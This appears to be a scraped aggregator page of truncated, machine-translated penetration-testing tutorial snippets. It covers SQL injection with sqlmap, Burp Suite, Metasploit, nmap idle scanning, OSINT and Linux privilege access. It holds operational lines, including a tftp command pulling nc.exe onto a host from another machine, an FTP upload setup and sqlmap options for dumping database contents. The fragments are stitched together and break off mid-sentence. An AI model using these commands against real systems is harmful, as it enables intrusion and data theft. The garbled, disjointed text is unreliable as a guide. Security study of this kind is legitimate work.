How to perform Web penetration testing
Web penetration testing can be considered from the following aspects:
1. SQL Injection (SQL Injection)
(1) how to test SQL injection?
First, find the URL page with parameters passed, such as the search page, login page, and submit the comment page.
Note 1: If the parameter is not
. List all users of SQL ServerVi. Database account and passwordVii. listing tables in a databaseParameters:-D: Specify the database name--tables: List TablesResults:The results reflect a total of 34 tables.Viii. listing fields in a tableParameters:-D: Specify the database name-T: Specify a table to list fields--columns: Specify list fieldsResults:The results show that the UserB table contains 23 fields.Nine, the Storm field contentParameters:-C: Specify the field to be burst--dump: Export the re
1. Brief descriptionFor the purpose of learning, penetration testing is not necessary to be a real environment, we can build an internal network, the installation of virtual machines on their own host can complete the experimental requirements, but also more convenient.2. Installing virtual machines and related softwareIn order to add a host to our virtual network, we need to build several virtual machines,
Burp suite is an integrated suite developed by portswigger for Web penetration testing. It includes modules such as spider, starter (paid version), intruder, repeater, sequencer, decoder, and comparer, each module has its unique purpose, which brings great convenience to the testing work of professional and non-professional Web
1. IntroductionMetasploit provides a number of friendly, easy-to-use tools for penetration testers. Metasploit was originally created by HD Moore and was later acquired by Radid7, a nexpose vulnerability scanner. During penetration testing, some of the work that can be done by hand can be done by Metasploit.The Metasploit needs to be updated frequently and the la
1. Exploit purposeA simple understanding of known vulnerabilities in the network is not enough for integrated security control of networks and systems. There are many benefits to conducting targeted, comprehensive vulnerability testing.
jump out of the safe work of speculation and suspicion. The management team can also get the details necessary to implement remediation by providing critical infrastructure intrusion that leads to sensitive
Familiar with the infiltration process, the attack will be as simple as building blocks! First Step: Information collectionCollecting site information is very important to penetration testing, and the information you collect is often an unexpected surprise in your infiltration.1. Website structureYou can use the Scan tool to scan the directory, mainly sweep out the site administrator portal, some sensi
Information collection at the early stage of Penetration Testing
Information collection at the early stage of Penetration Testing
Everything starts with a URL.
Use Google Hacking to view the target website, such as site: www.baidu.com. You can view the main site information, site: baidu.com, and view information about
Penetration testing process, often encounter the server system for Linux-related situations, kitchen knives under the view of permissions, sometimes good luck or root permissions. A long time ago for the root of the Linux server, during the infiltration process I really do not know how to start. Later, I know, if it is root permission, we can see whether open 22 port, if it is open, very good, you can log o
Sqlmap is an open-source, popular penetration testing tool that automates the detection process and leverages some SQL injection flaws to take over the database service.SQLMAP supports HTTP cookie features, all of which can be used for two purposes:1. Cookie-based authentication when required by the Web application;2. Detect and use SQL injected values in such header fields.By default, Sqlmap supports get p
of other target networks to send packets.#nmap-SL 192.168.1.6 192.168.1.1The Idle scan is an ideal anonymous scanning technology that sends data to the host 192.168.1.1 via 192.168.1.6 in the target network to get 192.168.1.1 open portsThere is a need for other scanning techniques, such as FTP Bounce (FTP bounce), fragmentation scan (fragment scanning), IP protocol scan (IP protocol scanning), discussed above are several of the most important scanning methods.Nmap OS Detection (O)One of the mos
How to use "mathematical modeling-graph theory model" for automated intranet penetration testing
Privilege escalation in the Active Directory domain is an important part of the struggle between most intruders and the Intranet administrator. Although obtaining the permissions of the domain or enterprise intranet administrator is not the ultimate goal of evaluation, it often makes the target to be tested easi
nc.exetftp -i 192.168.11.70 get nc.exeC:\TRANSF~1>FTP method
Another very useful way to upload files is to use the FTP server. Because FTP transfers data over TCP, it performs integrity verification, so you can upload large files. We can use an FTP server like vsftpd on Linux.
# apt-get install vsftpd
After vsftpd is installed, Edit/etcvsftpd.confFile, cancel the commented local_enable and write_enable, and restart the service to upload the file.
To use a non-interactive script to upload files
IntroductionThis document mainly describes the knowledge required for penetration testing. PentesterLab is going to summarize the basic knowledge and most common vulnerabilities of the test into a CD.About this documentTreaty to be observedPentersterLab's penetration strategy complies with the Creative Commons Attribution-nonequalcial-NoDerivs 3.0 Unported Licens
Today listened to the various explanations of Daniel, in the heart felt particularly deep, as a novice infiltration, I summed up some infiltration skills1, the principle is the keyYou can read these books carefully, and only a deep understanding can become Daniel.A, SQL injection attack and defenseB, upload vulnerability attack and defenseC, XSS Cross-site scripting attack and defenseD, command execution vulnerability attack and defenseE, Kali penetration
Amazing technology: using php socket5 proxy for Intranet penetration testing
During penetration testing, we often encounter webshells, but webserver provides web services through web port ing on the Intranet. If you have protection software that causes abnormal server permissions, you cannot create socket proxy and po
In the spirit of good things we share the point of view, to share, I myself in the penetration testing process often used in some sites. If you have good suggestions and additions, you can leave a comment below.NavisecWebsite: http://navisec.itNetwork security personnel's Internet navigation, security personnel essential website. Website focused content, and not too much decoration, style is extremely conci
Penetration Testing Some ideas to share(1) Collection of website informationfirst determine the language in which the website is written. Or if there is a mix-up. This can be obtained by viewing the site source files, observing site links, capturing submission requests, and so on. (2) Crawling Site Directoryusing tools to crawl the site directory, you can assist in the previous step to make the results more
preinstalled in Kali Linux.2.1 Default OutputTake www.baidu.com domain name as an example, implement a fast IP address query. Enter the following command on the Kali Linux terminal: # nslookup www.baidu.com The output information is as follows: Server 202.205.16.4 is the NDS server for this network, and UDP port 53 is the port used by DNS requests. According to the output shows that the Baidu alias is www.a.shifen.com, the query to two IP address description Baidu used more than one ser
LinkedInThe user names collected from LinkedIn will be of great use in subsequent tests. For example: social engineering attacks.MetagoofilMetagoofil is a tool that uses Google to gather information and currently supports the following types:1. Word2.Ppt3.Excel4. PdfCommands to use Metagoofil:#MetagoofilDemonstrate by an example:#metagoofil-D baidu.com-l 20-t doc,pdf-n 5-f Test.html-o testThrough this tool we can see very much information collected, such as user name, path information. We can u
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.